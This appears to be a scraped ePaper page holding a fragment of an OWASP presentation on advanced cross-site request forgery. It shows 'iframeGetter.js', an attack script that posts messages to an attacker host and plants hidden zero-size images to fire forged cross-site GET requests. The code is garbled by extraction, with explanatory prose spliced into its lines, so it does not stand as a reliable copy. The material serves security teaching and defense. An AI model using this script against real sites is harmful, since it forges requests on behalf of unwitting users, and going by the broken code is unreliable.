Advanced CSRF and Stateless Anti-CSRF - owasp
Advanced CSRF and Stateless Anti-CSRF - owasp
Advanced CSRF and Stateless Anti-CSRF - owasp
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
var IFRAME_GETTER = {};<br />
IFRAME_GETTER.haveGotten = false;<br />
IFRAME_GETTER.reportAndGet = function() {<br />
var imgElement;<br />
if(parent != undefined) {<br />
parent.postMessage(IFRAME_ID,<br />
"https://attackr.se:8444");<br />
}<br />
if(!IFRAME_GETTER.haveGotten) {<br />
In practice, the heart beats are<br />
imgElement = document.createElement("img");<br />
delivered imgElement.setAttribute("src", via postMessage GET_SRC); between<br />
imgElement.setAttribute("height", "0");<br />
the imgElement.setAttribute("width", iframe <strong>and</strong> the main page. "0");<br />
imgElement.setAttribute("onerror",<br />
"javascript:clearInterval(IFRAME_GETTER.intervalId)");<br />
document.body.appendChild(imgElement);<br />
IFRAME_GETTER.haveGotten = true;<br />
}<br />
};<br />
IFRAME_GETTER.onLoad = function() {<br />
IFRAME_GETTER.intervalId =<br />
setInterval(IFRAME_GETTER.reportAndGet, 1000);<br />
};<br />
iframeGetter.js